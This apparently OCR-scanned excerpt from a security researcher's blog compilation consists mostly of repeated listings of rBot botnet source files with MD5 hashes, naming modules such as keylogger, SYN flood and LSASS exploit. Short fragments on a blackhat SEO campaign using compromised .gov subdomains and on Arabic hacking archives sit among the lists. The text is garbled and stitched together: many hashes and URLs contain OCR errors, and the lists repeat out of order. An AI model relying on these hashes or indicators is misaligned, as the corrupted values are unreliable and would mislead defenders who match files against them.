b86f6921f7a720d6e7b204fbeb34e8d4 

pnp.cpp 

18f3999fab36920d34e796adf6a5612d 

pnp.h 

a6ea8al2b4309238b675c82cc04c6438 
processes.cpp 
6ac678aaef7/9bf7b4644c3eeaec45fb1 
processes.h 
f7c75cccfaaef0c459ac6c020cf6808d 

psniff.cpp 

c4eb189f05d2a7ff652afeOcdab3bd17 

psniff.h 5eebe93de4e03bf0bb118e35997743a9 
random.cpp 
8bc91b1034498c24800651720e81aa5d 
random.h 89181196laae00fb762c7b242c29fc64 
rBot.cpp 804bdacbbc9da64ef0191737204d4813 
rBot.dsp 642fdc4flafc39cc822c5cca514b0965 
rBot.dsw 37a2056d806c2c07d6a5e0ad7a9b75a0 
rBot.h 

6d17278915220464f9502b8ce5451f67 

rBot.ncb 4723c4a0db502b05d3cOb8ec7ada0edd 
rBot.opt 5c7739763d6f0d3d72342eae7dcf2f47 
rBot.plg b538cd31f0e48b6c6645b62eb38e30f7 
rBot.sIn 7616db7c42a85a9409f2bb2eb68de83e 
rBot.suo O0fa064426f7932096a419d472448213d 
rBot.vcproj 
64fa46097620fb63d479a0cd5cad4f7d 
redirect.cpp 
dacd372119ae0ab1750b3e2f83382a52 
redirect.h 
9e5349d6d6944a179b9ca7a7d847c335 
remotecmd.cpp 


35014f60da50aef7b6a7al9ff893247a 
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remotecmd.h 
1fb45492f87a66e34be6b4ca55b1cf86 
reqbuf.bin 
2d8fe918744e0f97f435f973d2af0be4 
rlogind.cpp 
2f26ca25770b2f22201d40541b1d9d29 
rlogind.h 
dbc479f2720ba03cb946419fbef774e0 
rndnick.cpp 
1a2ca37350424ebc8ece807afa055b72 
rndnick.h 
3cbe632d4ca6f152ca2a13bb1561d292 
sasser.cpp 
1fb775e0551413b6b3fdel79f818c4e5 
scan.cpp 66cOcfe5563eb8191fda0d9a6781acOf 
scan.h 
6236be771c0c88df937f75845a064f12 
secure.cpp 
0385d82f95182e40ed61329826da5934 
secure.h 231le3dd2ba09a8bbc039caf634e5306d 
session.cpp 
82e74c83142171a4998ca76b20b4177¢c 
session.h 
5f8¢353634b560052a5ebee5ef2 7ae32 
shellcode.cpp 
b16b4f6éaaf8a8c11822c931dc84f77d4 
shellcode.h 
cal4f267b73bc867b075ca56f524d52e 
socks4.cpp 
7d9d022be20b4dca6a204f8c1e027dbb 
socks4.h b103f307ffO2cd98fe2bfbecbd19c011 
sym06 _010.cpp 
93871169b31b9a269745d345c1e87404 
sym06 _010.h 
8092927570fd990f1c0063dc87d9d942 
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synflood.cpp 
d860c99e49b7c19e49c61a21baf0f66b 
synflood.h 
78df095c5aa59a0bfaa783e6edd38d0d 
sysinfo.cpp 
17375b805605f717739a8085be3f21f3 
sysinfo.h 
38774eadb5ba365df293ba4a222c4163 
tcpflood.cpp 
dd12816e442003152d2f65d42ce7eeb8 
tcpflood.h 
a9165cc828d623c51c297ec888803d9f 
tcpflood2.cpp 
65eaf8f6e8c69ed36fd175cc89d1644f 
tcpflood2.h 
f8307cc6251c3fce249a794314103804 
tcpip.h 
41b08a9fae20869c4eca0bae6dc2d971 
tftpd.cpp 
5aa60a160190a16817f785bdd8b5ef6a 
tftpd.h 
01a889b931f69e44f3a9421e16c327bc 
threads.cpp 
cbhe0ba8b50028430092c7f0e78841b71 
threads.h 
f1b57b9f58ff94af8d2adeec8e7839e6 
visit.cpp 
27fb4f513a944ba46a905c796bce0c81 
visit. 
766e4add98e2cb96bd37e87f4d9dfff9 
vncrooter.cpp 
0408a485ae2dd8e16e19ae945534cd06 
vncrooter.h 
b1b3696a947bdfc64a498247f1d0ce32 
wildcard.cpp 
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8785f287656995d8621d455ac7e04ab7 
wildcard.h 
64fa15a50564415d397166c3d0aec0a6 
workstation.cpp 
2823dd8a969c824d91329a79385195db 
workstation.h 
d16ef3f05e153e67803fba8d67532dal 
advscan.cpp 
769c82d829a83975fb75d191060f0654 
advscan.h 
d5bfa343e80c04d15d6d7b5e9ce92eef 
aliaslog.cpp 
826a551d0689a4e0846977a91c5d0fe6 
aliaslog.h 
52307a78ef96b5920f5edc93785166c6 
autostart.cpp 
70bdd438884ef8a62bd24a7c416303f4 
autostart.h 
ce33622adfc7b6e1543361c2a206229f 
avirus.cpp 
15eae314484b841cc21e6698a504d175 
avirus.h e55a156d28fde56a0bb05fc599dafecf 
capture.cpp 
8131417a0ade8b0cd43a6b1a441022dd 
capture.h 
1a27e95a9451b7b9fde4dd31labbe40c4 
cdkeys.cpp 
3f24656c7e76d36b031a0501f0df9693 
cdkeys.h 10199c0132621d0f86774ae3ea965f6c 
configs.h 
1e5959bf6626b5abf87472de249e70a8 
crc32.cpp 
3771c5b3f6992c43c0e12a57c41a/727e 
crc32.h 
1cd0adeb14bdd0dcbc3fe66a5fe2fed9 
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crypt.cpp 
f8d56522e7015cff349715794104c50f 
crypt.h 
Oe8cd32d6c5dbb0546c57d7fd213b365 
dcass.cpp 
9ee06759e2825alca0fc3aa004057eec 
dcass.h 
717dca288c88619445df69d3cbc0e855 
dcc.cpp 
bc19d35982b17f731a59c62b1c14c84d 
dcc.h 
€44c57141c37593156064072bd6570c2 
dcom.cpp 2262ea03ec74e3b10b428e2d114e589b 
dcom.h 
b2792e423f3ec732793723d53a0e12c8 
dcom2.cpp 
0ad20a541269c646caa86e8cef38d708 
dcom2.h 
e€9548b20f8d3d955969a8b515b426db4 
ddos.cpp ed0c9b5120f45a2ccb3572139a7d0061 
ddos.h 
b3d1a37538db741825844dfb3df4f7 2f 
defines.h 
46673d620280fc226ec48f96790a9eb4 
download.cpp 

664845639 Laff5fob872236bcb0af8b5 
download.h 
772d831e6b39c79d829d9fc8cdb713a6 
driveinfo.cpp 
9dc1c0a866f906b262d258a8ca3eda9e 
driveinfo.h 
8f57049be20497bcab61df57618ba9cfe 
ehandler.cpp 
7f85493a9bae6ab2dad717786502328c 


ehandler.h 
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3644e5ec559d2670426689d1c80b0509 
externs.h 

6efOd2ffff7 5a9b4aflbe7159d6fc26e 
findfile.cpp 
40273104f4bc7ebcd7f0b87673f39638 
findfile.h 
d21e9ef8155cf3c9efcbe8ec4244357a 
findpass.cpp 
21f63de47f8f0fdb9f989d6463a89032 
findpass.h 
1fecf202e0ebd30610d74f842979c82c 
fphost.cpp 
3b4e036a97dfabcd636e63245831853a 
fphost.h 72b9b3d4234fcbc5da07695ae3483cl1b 
ftpd.cpp e€132560098653c1160021245fd8e3c9e 
ftpd.h 
48a891506c957340b207b627105d7bb4 
functions.h 
000d108172efd4ble8a4af8a60cal7de 
globals.h 
65ad95c53b660b0fc4bad98f2d2d4b22 
httpd.cpp 
3b321d4bdc50573e2722291788667763 
httpd.h 
288553599c70aa95ec2119d78938578a 
icmpflood.cpp 
5caa21a85ea20819ca40e7454f11be33 
icmpflood.h 
4462c6318220648820316848deb124fd 
ident.cpp 
9f22919c49284e257ce0ed79dbd29bf6 
ident.h 
56c539d97aec2572f6fc9349edd7d9c2 
includes.h 
e67bccf4ff7d85d2cf08559b64fc8a98 
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irc send.cpp 
6a084f0b44846cfbd50498b8b03687e3 
irc send.h 

30d0176a5e9b6e3e5al 9bfb1lfcda444c 
keylogger.cpp 

€569621c990b3 7affc9cf4b050f2df2e 
keylogger.h 
a00df900cf42e596e4c48e8a9d52afed 
loaddlls.cpp 
1186093534flcfb47efd3e4e922c95d4 
loaddlls.h 
4703f87679db3655151348076c41a83a 
Isass.cpp 
b3d86a63eaa512289f087475faeaabd3 
Isass.h 
5b9d615744a8d6f4b2c9c19d2aed46ef 
Isass2.cpp 
da0492a87b10a88baa09e7e8330b2a0b 


Isass2.h 17e0f879e4ce5667c271cf2df3d97af0 


massasn.cpp 
858320bf874c5e0929597e721db2db51 
massasn.h 

9218d5e2b737c35a45d79a7d3907658a 


misc.cpp 4770444fdc75d9baac93b3bc29bfa51f 


misc.h 
f035c1642a8e3ff49ff19bb1be316333 
ms04 007 asnl.cpp 
8563b5de5c0e99c3dfdeca6cb89eaa67 
ms04 007 _asnl.h 
c18cb0ec17923a63653974cbfb1ldlecb 
mssql.cpp 
ae4b7ede7fd6b336d9041e7a4184989c 
mssqI.h 
82ec576d92ce6816d31878b8de36b349 
net.cpp 
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a1193f36f9bc058f9306fa922b957ed9 

net.h 

b1bb95c11a47aa666acd9a5929861726 
netutils.cpp 
7€91597c24a39f15682b255dc78973d5 
netutils.h 
ccbb3172d63a28dae5a98af36c27e354 
nicklist.h 
e9eb7e67eb89f60039d17c3fc5609ab4 
passwd.h c300d3b2a40113092a84186424b56079 
peer2peer.cpp 
7fa712db3241c69112b7a853516ff0f5 
peer2peer.h 
920cce5177elfcaacdf28ec4aal1c18b1 
pingudp.cpp 
8092a2919dab44410b1802c1b31ddc7a 
pingudp.h 
b86f6921f7a720d6e7b204fbeb34e8d4 

pnp.cpp 

18f3999fab36920d34e796adf6a5612d 

pnp.h 

a6ea8al2b4309238b675c82cc04c6438 
processes.cpp 
6ac678aaef/9bf7b4644c3eeaec45fb1 
processes.h 
f7c75cccfaaef0c459ac6c020cf6808d 

psniff.cpp 
d9adde533bb267e2921def8ca52ee4a9 

psniff.h 5eebe93de4e03bf0bb118e35997743a9 
random.cpp 
8bc91b1034498c24800651720e81aa5d 
random.h 89181196laae00fb762c7b242c29fc64 
rBot.cpp ecb5f195c18aea3ba93f7220bee113bb 
rBot.dsp d4627c7c29cce3bc91e6d8445a92751a 


rBot.dsw 37a2056d806c2c07d6a5e0ad7a9b75a0 
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al.a.vihfa.gov 
a2.a.vihfa.gov 
a3.a.vihfa.gov 
a4.a.vihfa.gov 
a5.a.vihfa.gov 
a6.a.vihfa.gov 
a7.a.vihfa.gov 
a8.a.vihfa.gov 
a9.a.vihfa.gov 


al10.a.vihfa.gov 
Related subdomains now no longer responding : 


2k110.x.vihfa.gov 
2k106.x.vihfa.gov 
j11.y.vihfa.gov 


j9.y.vihfa.gov 
z1.z.vihfa.gov 


Where’s the connection between this blackhat SEO operation and [4]the previous one? It’s 
not just that both subdomains at the different .gov’s are responding to IPs from the same 
netblock, but also, 89.28.13.202 is responding to City of Somerset’s subdomains from the 
previous incident such as : j6.y.somersettx.gov; st9.x.somersettx.gov; x.somersettx.gov. 


Looks like someone in Moldova will get spanked for these incidents. 


1. http://w. computerworla.con/blogs inode/6138 
2. http: //ddanchev. blogspot .com/2007/10/compromised-sites-serving-malware-and. html 
3, beep: //ddanchev.blogspot.com/2007/10/compronised-sites~serving-nalvare~and. hea 
4. netp://ddanchev. blogspot .con/2007/10/conpronised-sites~serving-aalvare-end. tal 
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rBot.h 

6d17278915220464f9502b8ce5451f67 
rBot.ncb 8c3260680b4c6bc37142c08ed3a84077 
rBot.opt ce2d8ab8f79bclaa76dde483fbc897b6 
rBot.plg 95822835b4572e05ff0d0c8c0a14808b 
rBot.sIn 7616db7c42a85a9409f2bb2eb68de83e 
rBot.suo O0fa064426f7932096a419d472448213d 
rBot.vcproj 
64fa46097620fb63d479a0cd5cad4f7d 
redirect.cpp 
dacd372119ae0ab1750b3e2f83382a52 
redirect.h 
9e5349d6d6944a179b9ca7a7d847c335 
remotecmd.cpp 

35014f60da50aef7b6a7al 9ff893247a 
remotecmd.h 
1fb45492f87a66e34be6b4ca55b1cf86 
reqbuf.bin 
2d8fe918744e0f97f435f973d2af0be4 
rlogind.cpp 
2f26ca25770b2f22201d40541b1d9d29 
rlogind.h 

dbc479f2720ba03cb946419fbef774e0 
rndnick.cpp 
1a2ca37350424ebc8ece807afa055b72 
rndnick.h 
3cbe632d4ca6f152ca2a13bb1561d292 
sasser.cpp 
1fb775e0551413b6b3fdel79f818c4e5 
scan.cpp 66cOcfe5563eb8191fda0d9a6781lacOf 
scan.h 

6236be771c0c88df937f75845a064f12 
secure.cpp 
0385d82f95182e40ed61329826da5934 
secure.h 231le3dd2ba09a8bbc039caf634e5306d 
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session.cpp 
82e74c83142171a4998ca76b20b4177¢c 
session.h 
5f8¢353634b560052a5ebee5ef27ae32 
shellcode.cpp 
b16b4f6éaaf8a8c11822c931dc84f77d4 
shellcode.h 
cal4f267b73bc867b075ca56f524d52e 
socks4.cpp 
7d9d022be20b4dca6a204f8c1e027dbb 
socks4.h b103f307ffO2cd98fe2bfbecbd19c011 
synflood.cpp 
d860c99e49b7c19e49c61a21baf0f66b 
synflood.h 
78df095c5aa59a0bfaa783e6edd38d0d 
sysinfo.cpp 
17375b805605f717739a8085be3f21f3 
sysinfo.h 
38774eadb5ba365df293ba4a222c4163 
tcpflood.cpp 
dd12816e442003152d2f65d42ce7eeb8 
tcpflood.h 
a9165cc828d623c51c297ec888803d9F 
tcpflood2.cpp 
65eaf8f6e8c69ed36fd175cc89d1644F 
tcpflood2.h 
f8307cc6251c3fce249a794314103804 
tcpip.h 
41b08a9fae20869c4eca0bae6dc2d971 
tftpd.cpp 
celb176bbe40a2b58de611d8a415bd4d 
tftpd.h 
01a889b931f69e44f3a9421e16c327bc 
threads.cpp 


cbe0ba8b50028430092c7f0e78841b71 
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threads.h 
f1b57b9f58ff94af8d2adeec8e7839e6 
visit.cpp 
27f64f513a944ba46a905c796bce0c81 
visit. 
766e4add98e2cb96bd37e87f4d9dfff9 
vncrooter.cpp 
0408a485ae2dd8e16e19ae945534cd06 
vncrooter.h 
b1b3696a947bdfc64a498247f1d0ce32 
wildcard.cpp 
8785f287656995d8621d455ac7e04ab7 
wildcard.h 
64fa15a50564415d397166c3d0aec0a6 
wkssvc.cpp 
90758d8ed4b35cb0f21a8638ab3b9b94 


wkssvc.h 40cbf340990988e1214bc77e02d2ad93 


workstation.cpp 
2823dd8a969c824d91329a79385195db 
workstation.h 
d16ef3f05e153e67803fba8d67532dal 
advscan.cpp 
b50a5b6585d66d156184d1a86c9ffbfd 
advscan.h 
d5bfa343e80c04d15d6d7b5e9ce92eef 
aliaslog.cpp 
826a551d0689a4e0846977a91c5d0fe6 
aliaslog.h 
52307a78ef96b5920f5edc93785166c6 
autostart.cpp 
70bdd438884ef8a62bd24a7c416303f4 
autostart.h 
ce33622adfc7b6e1543361c2a206229f 
avirus.cpp 
15eae314484b841cc21e6698a504d175 
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avirus.h e55a156d28fde56a0bb05fc599dafecf 
capture.cpp 
8131417a0ade8b0cd43a6b1a441022dd 
capture.h 
1a27e95a9451b7b9fde4dd3labbe40c4 
cdkeys.cpp 
3f24656c7e76d36b031a0501f0df9693 
cdkeys.h 10199c0132621d0f86774ae3ea965f6c 
configs.h 
e2371a2e3ced53ec1f74cbd2dea5f30b 
crc32.cpp 
3771c5b3f6992c43c0e12a57c41a727e 
crc32.h 

1cd0adeb14bdd0dcbc3fe66a5fe2fed9 
crypt.cpp 
f8d56522e7015cff349715794104c50f 

crypt.h 
Oe8cd32d6c5dbb0546c57d7fd213b365 
dcass.cpp 
9ee06759e2825alca0fc3aa004057eec 
dcass.h 
717dca288c88619445df69d3cbc0e855 
dcc.cpp 
bc19d35982b17f731a59c62b1c14c84d 

dcc.h 

€44c57141c37593156064072bd6570c2 
dcom.cpp 2262ea03ec74e3b10b428e2d114e589b 
dcom.h 
b2792e423f3ec732793723d53a0e12c8 
ddos.cpp ed0c9b5120f45a2ccb3572139a7d0061 
ddos.h 

b3d1a37538db741825844dfb3df4f7 2f 
defines.h 
c7218b48fbe0425baa666dc891535d31 


download.cpp 
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664845639 lLaff5fbob872236bcb0af8b5 
download.h 
772d831e6b39c79d829d9fc8cdb713a6 
driveinfo.cpp 
9dc1c0a866f906b262d258a8ca3eda9e 
driveinfo.h 
8f57049be20497bca61df57618ba9cfe 
ehandler.cpp 
7f85493a9bae6ab2dad717786502328c 
ehandler.h 
3644e5ec559d2670426689d1c80b0509 
externs.h 
6efOd2ffff75a9b4aflbe7159d6fc26e 
findfile.cpp 
40273104f4bc7ebcd7f0b87673f39638 
findfile.h 
d21e9ef8155cf3c9efcbe8ec4244357a 
findpass.cpp 
21f63de47f8f0fdb9f989d6463a89032 
findpass.h 
1lfecf202e0ebd30610d74f842979c82c 
fphost.cpp 
3b4e036a97dfabcd636e63245831853a 
fphost.h 7269b3d4234fcbc5da07695ae3483cl1b 
ftpd.cpp c065b5a9638115729cc01613e48338c9 
ftpd.h 
48a891506c957340b207b627105d7bb4 
functions.h 
000d108172efd4ble8a4af8a60cal7de 
globals.h 
65ad95c53b660b0fc4bad98f2d2d4b22 
httpd.cpp 
3b321d4bdc50573e2722291788667763 
httpd.h 
288553599c70aa95ec2119d78938578a 
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icmpflood.cpp 
5caa21a85ea20819ca40e7454f11be33 
icmpflood.h 
4462c6318220648820316848deb124fd 
ident.cpp 
9f22919c49284e257ce0ed79dbd29bf6 
ident.h 
56c539d97aec2572f6fc9349edd7d9c2 
includes.h 
€2598e0c09c15c633762290f70f498fd 
irc send.cpp 
6a084f0b44846cfbd50498b8b03687e3 
irc _send.h 

30d0176a5e9b6e3e5al 9bfb1fcda444c 
keylogger.cpp 
€569621c990b37affc9cf4b050f2df2e 
keylogger.h 
a00df900cf42e596e4c48e8a9d52afed 
loaddlls.cpp 
1186093534flcfb47efd3e4e922c95d4 
loaddlls.h 
4703f87679db3655151348076c41a83a 
Isass.cpp 
b3d86a63eaa512289f087475faeaabd3 
Isass.h 
5b9d615744a8d6f4b2c9c19d2aed46ef 
Isass2.cpp 
da0492a87b10a88baa09e7e8330b2a0b 
Isass2.h 17e0f879e4ce5667c271cf2df3d97af0 
massasn.cpp 
858320bf874c5e0929597e721db2db51 
massasn.h 
9218d5e2b737c35a45d79a7d3907658a 
misc.cpp 4770444fdc75d9baac93b3bc29bfa51f 
misc.h 
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f035c1642a8e3ff49ff19bb1be316333 
ms04 007 asnl.cpp 
8563b5de5c0e99c3dfdeca6cb89eaab67 
ms04 007 asnl.h 
c18cb0ec17923a63653974cbfb1dlecb 
net.cpp 
a1193f36f9bc058f9306fa922b957ed9 
net.h 
b1bb95c11a47aa666acd9a5929861726 
netapi.cpp 
767¢c2b20c022d6146937baa51ffa4ac5 
netapi.h 6300dc4bf60d997941ef5627f284f526 
netutils.cpp 
7€91597c24a39f15682b255dc78973d5 
netutils.h 
ccbb3172d63a28dae5a98af36c27e354 
nicklist.h 
e9eb7e67eb89f60039d17c3fc5609ab4 
passwd.h c300d3b2a40113092a84186424b56079 
pingudp.cpp 
8092a2919dab44410b1802c1b31ddc7a 
pingudp.h 
b86f6921f7a720d6e7b204fbeb34e8d4 
pnp.cpp 
18f3999fab36920d34e796adf6a5612d 
pnp.h 
a6ea8al2b4309238b675c82cc04c6438 
processes.cpp 
6ac678aaef79bf7b4644c3eeaec45fb1 
processes.h 
f7c75cccfaaef0c459ac6c020cf6808d 
psniff.cpp 
c4eb189f05d2a7ff6e52afeOcdab3bd17 
psniff.h 5eebe93de4e03bf0bb118e35997743a9 


random.cpp 
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8bc91b1034498c24800651720e81aa5d 
random.h 89181196laae00fb762c7b242c29fc64 
rBot.cpp 804bdacbbc9da64ef0191737204d4813 
rBot.dsp 642fdc4flafc39cc822c5cca514b0965 
rBot.dsw 37a2056d806c2c07d6a5e0ad7a9b75a0 
rBot.h 

6d17278915220464f9502b8ce5451f67 

rBot.ncb e206f087c8ab2509728e9326f6368c3b 
rBot.opt be681012cbc1e2e3d487dcbec4ae9186 
rBot.plg d5eb40d4087ec05bdf53d52d82de5d96 
rBot.sIn 7616db7c42a85a9409f2bb2eb68de83e 
rBot.suo O0fa064426f7932096a419d472448213d 
rBot.vcproj 
64fa46097620fb63d479a0cd5cad4f7d 
redirect.cpp 
dacd372119ae0ab1750b3e2f83382a52 
redirect.h 
9e5349d6d6944a179b9ca7a7d847c335 
remotecmd.cpp 
35014f60da50aef7b6a7al19ff893247a 
remotecmd.h 
1fb45492f87a66e34be6b4ca55b1cf86 
reqbuf.bin 

2d8fe918744e0f97f435f973d2af0be4 
rlogind.cpp 
2f26ca25770b2f22201d40541b1d9d29 
rlogind.h 

dbc479f2720ba03cb946419fbef774e0 
rndnick.cpp 
1a2ca37350424ebc8ece807afa055b72 
rndnick.h 
3cbe632d4ca6f152ca2a13bb1561d292 
sasser.cpp 
1fbo775e0551413b6b3fdel79f818c4e5 

scan.cpp 66cOcfe5563eb8191fda0d9a6781acOf 
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scan.h 
6236be771c0c88df937f75845a064f12 
secure.cpp 
0385d82f95182e40ed61329826da5934 


secure.h 231e3dd2ba09a8bbc039caf634e5306d 


session.cpp 
82e74c83142171a4998ca76b20b4177¢c 
session.h 
5f8c353634b560052a5ebee5ef27ae32 
shellcode.cpp 
b16b4f6éaaf8a8c11822c931dc84f77d4 
shellcode.h 
cal14f267b73bc867b075ca56f524d52e 
socks4.cpp 
7d9d022be20b4dca6a204f8c1e027dbb 


socks4.h b103f307ff02cd98fe2bfbecbd19c011 


sym06 _010.cpp 
93871169b31b9a269745d345c1e87404 
sym06 _010.h 
8092927570fd990f1c0063dc87d9d942 
synflood.cpp 
d860c99e49b7c19e49c61a21baf0f66b 
synflood.h 
78df095c5aa59a0bfaa783e6edd38d0d 
sysinfo.cpp 
17375b805605f717739a8085be3f21f3 
sysinfo.h 
38774eadb5ba365df293ba4a222c4163 
tcpflood.cpp 
dd12816e442003152d2f65d42ce7eeb8 
tcpflood.h 
a9165cc828d623c51c297ec888803d9f 
tcpflood2.cpp 
65eaf8f6e8c69ed36fd175cc89d1644f 
tcpflood2.h 
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f8307cc6251c3fce249a794314103804 
tcpip.h 
41b08a9fae20869c4eca0bae6dc2d971 
tftpd.cpp 
5aa60a160190a16817f785bdd8b5ef6a 
tftpd.h 
01a889b931f69e44f3a9421e16c327bc 
threads.cpp 
cbe0ba8b50028430092c7f0e78841b71 
threads.h 
f1b57b9f58ff94af8d2adeec8e7839e6 
visit.cpp 
27fb4f513a944ba46a905c796bce0c81 
visit.h 
766e4add98e2cb96bd37e87f4d9dfff9 
vncrooter.cpp 
0408a485ae2dd8e16e19ae945534cd06 
vncrooter.h 
b1b3696a947bdfc64a498247f1d0ce32 
wildcard.cpp 
8785f287656995d8621d455ac7e04ab7 
wildcard.h 
64fa15a50564415d397166c3d0aec0a6 
workstation.cpp 
2823dd8a969c824d91329a79385195db 
workstation.h 
d16ef3f05e153e67803fba8d67532dal 
advscan.cpp 
1d994b44bdd7961dcc019ccle4a90bae 
advscan.h 
d5bfa343e80c04d15d6d7b5e9ce92eef 
botkiller.cpp 
f0c6e234812b3d5269528d92c0dd07d5 
configs.h 
fd41eb4e5ac2941232001a799aeb8c36 
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3.11.13 Teaching Cyber Jihadists How to Hack (2007-11-12 20:57) 


Avg SI! o Ue! daiSo | 


Yet another indication of the emerging trend of building a knowledge-driven cyber jihadist 
community, are such online archives with localized to Arabic standard security and hacking 
research papers, ones you definitely came across to before, or may have in fact written by 
yourself. As I’ve already discussed this trend in previous posts, it’s a PSYOPS strategy in ac- 
tion, one that’s aiming to improve the overall perception of cyber jihadists’ ability to wage 
[1]their battles without [2]using software and web services [3]of their enemies. Whether the 
investment in time and resources is worth it is another topic, what’s worth pointing out are the 
efforts they put into localizing the content in between adding the standard propaganda layer, 
and later on, [4]building a community around it. 


. http: //ddanchev. blogspot .com/2007/05/jihadists-anonymous-internet- surfing. html 
. http: //ddanchev.blogspot .com/2007/04/mujahideen-secrets-encryption-tool.html 

. http: //ddanchev.blogspot.com/2007/07/cyber- jihadists-and-tor.html 

. http://ddanchev. blogspot . com/2007/09/dark-web-and-cyber- jihad. html 
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defines.h 
c7218b48fbe0425baa666dc891535d31 
externs.h 
f37853aa5e8a64ddccb35bd7699f166d 
functions.h 
f85dbebbbfallb2ba5abfc82fcc00a97 
globals.h 
0c7076f93955d70f29e0fba937eac55e 
includes.h 
f7491b80138d2b6cfe7e78d35e0e9cfd 
keylogger.cpp 
€569621c990b37affc9cf4b050f2df2e 
loaddlls.cpp 
b780b4c9d260f0c75105a56241130el1f 
mssqlI.cpp 
cdd749c5fc949f4417fca6bd2415ed96 
rBot.cpp 3074d11dbe5538487935366a0d0a2128 
rBot.dsp 48f4c8e84a29697d273e8b4629de0824 
rBot.dsw 37a2056d806c2c07d6a5e0ad7a9b75a0 
rBot.h 
d9aad62fd7416c85e3aedba74c2d29f5 
rBot.ncb a45835c44463f06f8853f5a560b9b380 
rBot.opt 1e0a25dde4c635d59cl1fcadOla5bacc5 
rBot.plg 1bc002636918653eea580283d113a694 
rBot.sIn 7616db7c42a85a9409f2bb2eb68de83e 
rBot.suo O0fa064426f7932096a419d472448213d 
rBot.vcproj 
64fa46097620fb63d479aO0cd5cad4f7d 
reqbuf.bin 
2d8fe918744e0f97f435f973d2af0be4 
ehandler.obj 
4601e247780383f10130040eafe52f2b 
ehandler.sbr 
irc send.obj 
04229e7ac566254b2f1f8clcacb2faae 
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irc _send.sbr 

rBot.bsc 
9cfOf56eaa2b4d5cd6637ff6df53c3a5 
rBot.pdb 92a6402348749ab5afa54b9f51b21da3 
advscan.cpp 
d7ea6459d9a411d000be42bf2fe392c6 
advscan.h 
14e91c9bde81d18e07a37868401e46c9 
aliaslog.cpp 
826a551d0689a4e0846977a91c5d0fe6 
aliaslog.h 
52307a78ef96b5920f5edc93785166c6 
autostart.cpp 
d70a3b4d0a0c2026193ca486e6bde7bb 
autostart.h 
ce33622adfc7b6e1543361c2a206229f 
avirus.cpp 
92917e1d8364a7f27fca0ce163c6337a 
avirus.h e55a156d28fde56a0bb05fc599dafecf 
capture.cpp 
8131417a0ade8b0cd43a6b1a441022dd 
capture.h 
1a27e95a9451b7b9fde4dd3labbe40c4 
CHANGES!!!.txt 
518606f61e32ddb884341daf02906681 
configs.h 
2d3836e893166969a72563c93c667dbf 
crc32.cpp 
3771c5b3f6992c43c0e12a57c41a727e 
crc32.h 
1cd0adeb14bdd0dcbc3fe66a5fe2fed9 
crypt.cpp 
f8d56522e7015cff349715794104c50f 
crypt.h 


Oe8cd32d6c5dbb0546c57d7fd213b365 
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dcc.h 
€44c57141c37593156064072bd6570c2 
dcom.cpp 3ccab587bca4ad021bddcOebcb3e40bb 
dcom.h 
b2792e423f3ec732793723d53a0e12c8 
dcom135lsass.cpp 
83aa7079b550834194e6f2ad0339f348 
dcom135lsass.h 
bc7107ecaf2d45fb58372a9ca35df898 
ddos.cpp ed0c9b5120f45a2ccb3572139a7d0061 
ddos.h 
b3d1a37538db741825844dfb3df4f7 2f 
defines.h 
cled281180152146d6f84bda2adb0b5f 
download.cpp 

664845639 lLaff5fob872236bcb0af8b5 
download.h 
772d831e6b39c79d829d9fc8cdb713a6 
driveinfo.cpp 
9dc1c0a866f906b262d258a8ca3eda9e 
driveinfo.h 
8f57049be20497bca61df57618ba9cfe 
ehandler.cpp 
7f85493a9bae6ab2dad717786502328c 
ehandler.h 
3644e5ec559d2670426689d1c80b0509 
externs.h 
158451db5472e457ffcffabaal6éd6el5 
findfile.cpp 
40273104f4bc7ebcd7f0b87673f39638 
findfile.h 
d21e9ef8155cf3c9efcbe8ec4244357a 
findpass.cpp 
21f63de47f8f0fdb9f989d6463a89032 
findpass.h 
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1fecf202e0ebd30610d74f842979c82c 
fphost.cpp 
3b4e036a97dfabcd636e63245831853a 
fphost.h 72b9b3d4234fcbc5da07695ae3483cl1b 
ftpd.cpp 6f4452ac54338e40dadfd5a026660ab7 
ftpd.h 
48a891506c957340b207b627105d7bb4 
functions.h 
000d108172efd4ble8a4af8a60cal7de 
globals.h 
65ad95c53b660b0fc4bad98f2d2d4b22 
httpd.cpp 
3b321d4bdc50573e2722291788667763 
httpd.h 
288553599c70aa95ec2119d78938578a 
icmpflood.cpp 
5caa21a85ea20819ca40e7454f11be33 
icmpflood.h 
4462c6318220648820316848deb124fd 
ident.cpp 
9f22919c49284e257ce0ed79dbd29bf6 
ident.h 
56c539d97aec2572f6fc9349edd7d9c2 
iisSssl.cpp 
50225071413f4969cO0ccbd0662c238e0 
iis5ssl.h 
c59eb88c83cff84e75a02897215ad2ce 
includes.h 
83a3ec7520209c9b025062a7c37cabad 
irc send.cpp 
6a084f0b44846cfbd50498b8b03687e3 
irc _send.h 

30d0176a5e9b6e3e5al 9bfb1fcda444c 
keylogger.cpp 
€569621c990b37affc9cf4b050f2df2e 
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keylogger.h 
a00df900cf42e596e4c48e8a9d52afed 
loaddlls.cpp 
1186093534flcfb47efd3e4e922c95d4 
loaddlls.h 
4703f87679db3655151348076c41a83a 
Isass.cpp 
Adf2f4f62f2689dc345b2aabf34e4e63 
Isass.h 
30af5080bcec2b6a1e602029757ada2b 
Isass2.cpp 
26fa9f8f14805805c528f27a7bfc427b 
Isass2.h 03467635387d90070eccb6fab5f00aac 
misc.cpp 4770444fdc75d9baac93b3bc29bfa51f 
misc.h 
f035c1642a8e3ff49ff19bb1be316333 
myshellcode.asm 
ce26d85257d8fa2c68a5ad6012ed010c 
net.cpp 
a1193f36f9bc058f9306fa922b957ed9 
net.h 
b1bb95c11a47aa666acd9a5929861726 
netbios.cpp 
cbb8b7b5a54122492e30ec85430fa37e 
netbios.h 
dd155768799804528c6cd19d67df42a3 
netdevil.h 
a89982a588e965ce01448c60a81585b3 
netutils.cpp 
70€91597c24a39f15682b255dc78973d5 
netutils.h 
ccbb3172d63a28dae5a98af36c27e354 
nicklist.h 
e9eb7e67eb89f60039d17c3fc5609ab4 


passwd.h c300d3b2a40113092a84186424b56079 
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pingudp.cpp 
8092a2919dab44410b1802c1b31ddc7a 
pingudp.h 
b86f6921f7a720d6e7b204fbeb34e8d4 
pnp445.cpp 
c761581559513dafe45f54ce33f47bfa 
pnp445.h 1136f0ee3455546584797022624d70a8 
processes.cpp 
6ac678aaef/9bf7b4644c3eeaec45fb1 
processes.h 
f7c75cccfaaef0c459ac6c020cf6808d 
random.cpp 
4f83bbb6667242b8faaffe715bb72e7e 
random.h 72101c961e86107d6d1d0e2b70fcelel 
rBot.cpp e5808fe93b9eb54d8f5fdac7a847b33d 
rBot.dsp 50ce419a391f324afd27bcfb78eaebaf 
